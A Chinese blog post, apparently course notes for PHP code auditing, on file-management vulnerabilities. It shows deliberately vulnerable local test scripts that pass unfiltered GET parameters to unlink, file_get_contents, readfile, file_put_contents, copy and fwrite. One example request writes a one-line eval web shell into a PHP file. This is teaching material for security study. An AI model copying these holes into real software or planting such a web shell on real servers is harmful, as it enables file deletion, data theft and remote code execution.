PHP代码审计 13 文件管理漏洞

最新推荐文章于 2023-04-19 09:58:52 发布
最新推荐文章于 2023-04-19 09:58:52 发布
阅读量555 收藏 1
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81146099
版权

本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程

PHP 代码审计博客目录

1. 简介

  1. 常见函数

    1. copy
    2. rmdir
    3. unlink 删除文件
    4. delete
    5. fwrite
    6. fopen
    7. fgetc
    8. fgetcsv
    9. fgets
    10. fgetss
    11. file
    12. file_get_contents 读取 php 文件内容
    13. fread
    14. readfile 输出文件字符总长度
    15. ftruncate
    16. file_put_contents
    17. fputcsv
    18. fputs
    19. chmod

  2. 测试 unlink() 函数

    新建 demo.php 文件,内容为任意内容

    新建 test.php

     <?php
 $file=$_GET['file'];
 if(isset($file)){
 	unlink($file);
 }
 ?>

    浏览器执行 http://127.0.0.1/test.php?file=demo.php

    结果为 demo.php 文件被删除

  3. 测试 file_get_contents() 函数

    新建 demo.php

     <?php
 echo demo.php;
 ?>

    新建 test.php

     <?php
 $file=$_GET['file'];
 echo file_get_contents($file);
 ?>

    浏览器执行 http://127.0.0.1/test.php?file=demo.php

    结果在浏览器中的查看源代码中

    在这里插入图片描述

  4. 测试 readfile() 函数

    新建 demo.php

     <?php
 echo demo.php;
 ?>

    新建 test.php

     <?php
 $file=$_GET['file'];
 echo readfile($file);
 ?>

    浏览器执行 http://127.0.0.1/test.php?file=demo.php

    结果在浏览器中的查看源代码中

    在这里插入图片描述

  5. 测试 file_put_contents() 函数

    新建 demo.php

    <?php
echo demo.php;
?>

    新建 test.php

    <?php
$file=$_GET['file'];
$content=$_GET['txt'];
echo file_put_contents($file,$content);
?>

    浏览器执行 http://127.0.0.1/test.php?file=demo.php&txt=<?php eval($_POST['CMD']);?>

    结果在浏览器中的查看源代码中

    在这里插入图片描述

    查看 demo.php 文件已经被覆盖

    在这里插入图片描述

  6. copy() 函数

    新建 demo.php

     <?php
 echo demo.php;
 ?>

    新建 test.php

     <?php
 $file=$_GET['file'];
 $content=$_GET['txt'];
 copy($file,$content);
 ?>

    浏览器执行 http://127.0.0.1/test.php&txt=demo2.php

    结果在 www 目录下出现了新的文件 demo2.php

  7. fwrite() 函数

    新建 test.php

     <?php
 $file=$_GET['file'];
 $content=$_GET['txt'];
 fwrite(fopen($file,"a+"),"<?php phpinfo();?>");
 ?>

    浏览器执行 http://127.0.0.1/test.php?file=demo3.php

    结果在 www 目录下出现了新的文件 demo3.php

网络安全打工人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计中常见的漏洞(一)
武天旭的博客
05-31 1036
经过漫长时间的迭代更新,内容从一开始的碎片化网罗搜集,到排版与整合划分,再到学习与实践验证,最后摒弃初始,用自己的语言与实践结论通俗的将它展现出来。强化知识技能的同时也为读者带来更好的阅读体验。 本篇介绍了以下代码安全问题:
你不知道的文件上传漏洞php代码分析
12-18
本文将深入探讨文件上传漏洞及其防范措施,主要关注PHP代码分析。 首先,我们要理解文件上传漏洞是如何产生的。在上述示例中,`upload.php`允许用户上传任意类型的文件,例如通过以下HTML表单: ```html ...
php代码审计【14】文件管理
司徒荆的博客
06-29 203
文件管理
PHP代码审计 ------- 文件包含漏洞
最新发布
qq_62344745的博客
04-19 209
文件包含漏洞的产生原因是在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞,被包涵的文件在第三方服务是,就形成了远程文件包含漏洞
代码审计——文件操作漏洞概述
王嘟嘟的博客
10-19 551
0x00 前言 如饥似渴的学习ing。 0x01 文件包含漏洞概述 本地文件包含是指只能包含本机文件文件包含漏洞,大多出现在模块加载、模板加载和cache调用这些地方。 1.远程文件包含 可以包含远程文件的包含漏洞,远程文件包含需要设置allow_url_include=On. 2.文件包含截断 大多数的文件包含漏洞都是需要阶段你的,正常程序里面包含的文件diamante一般是include&l...
[代码审计]php上传漏洞总结
ShadowAssassin的专栏
06-05 2333
背景: 这两天在网上瞎看,看到别人总结的一个上传漏洞靶场,觉得很不错,就是自己测试了下, 感觉对代码审计能力提高还是有帮助的,下面简单介绍靶场的解题思路(当然,每一题可能存在多种上传方式)。 靶场地址:https://github.com/c0ny1/upload-labs 一、环境搭建 建议使用靶场提供的测试环境。 二、解题思路 Pass-01: 检查代码: functio...
PHP代码审计7—文件上传漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-01 3263
文件上传基础整理与示例分析
php代码审计文件包含漏洞
xujunhui222的博客
02-15 3289
php代码审计文件包含漏洞 一、文件包含漏洞介绍 1.什么是文件包含 相同代码重复出现在不同文件中出现代码亢余,所以出现了文件包含函数,就是让代码更为高效。需要用到的部分会去调用,且被包含的文件会当PHP代码执行,忽略本身后缀名。文件包含分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI),远程文件包含需要在php.ini中设置allow_url_include = on 和 allow_url_fopen = on 2.
PHP代码审计11—逻辑漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1521
逻辑漏洞基础与示例分析
php代码审计之任意文件读取漏洞
cj_Hydra's Blog
02-21 2063
前言: 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取的配置信息甚至系统重要文件,当然,严重的话, 就可能导致SSRF,进而漫游内网。 代码审计: 这次审计的代码,还是之前的一个审计靶场,个人说过是比较适合初级审计人员的一个靶场,里面包含了常见的漏洞。废话不多说,看步骤。 第一步:首先我们通过全文搜索的方式搜索:file_get_contents结果搜索到了一个名为user/a...
PHP代码审计文档.zip
11-02
13课:PHP代码审计之目录穿越及文件包含漏洞mp4 第12课:PHP代码审计文件上传漏洞mp4 第11课:代码审计之CSRF漏洞mp4 第10课:代码审计之XSS漏洞mp4 第9课:代码审计之命令执行漏洞mp4 第8课:代码审计之代码执行...
PHP代码审计音频文件.zip
11-02
任务13PHP代码审计之目录穿越及文件包含漏洞mp4 任务12:PHP代码审计文件上传漏洞mp4 任务11:代码审计之CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码审计之命令执行漏洞mp4 任务8:代码审计之代码执行...
PHP代码审计入门笔记.zip
07-14
"PHP代码审计入门笔记"这本书或文档将提供更详细的操作步骤、实例分析和技巧,帮助你逐步掌握这个技能。通过学习和实践,你将能够对PHP代码进行有效的审计,提升代码质量,保障系统的安全稳定运行。
PHP代码审计 17 实战 Xdcms 漏洞挖掘 SQL 注入
kevinhanser
07-23 1928
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 思路 查看网站后台管理页面的源码,查看网站使用了那些过滤函数(通常会有一些自定义的过滤函数可供调用) 通常情况下 GETGET_GET、_POST 都是用了过滤函数之后才会和数据库进行连接,如果发现未使用过滤函数,那么说明存在漏洞。 在页面 ...
PHP 代码审计博客目录
kevinhanser
07-18 1115
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程
米安代码审计 07 越权漏洞
kevinhanser
07-24 1005
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 什么是越权 越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的...
PHP代码审计 07 PHP伪协议和文件包含
kevinhanser
07-20 921
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 php 伪协议 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — ...
PHP代码审计:代码执行漏洞深度剖析
这篇文档主要探讨了PHP代码审计中的一个重要主题——代码执行,这是渗透测试中常见的安全问题。通过代码审计,开发者和安全专家可以识别并修复潜在的安全漏洞,防止恶意攻击者利用这些漏洞执行任意代码。 一、介绍 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值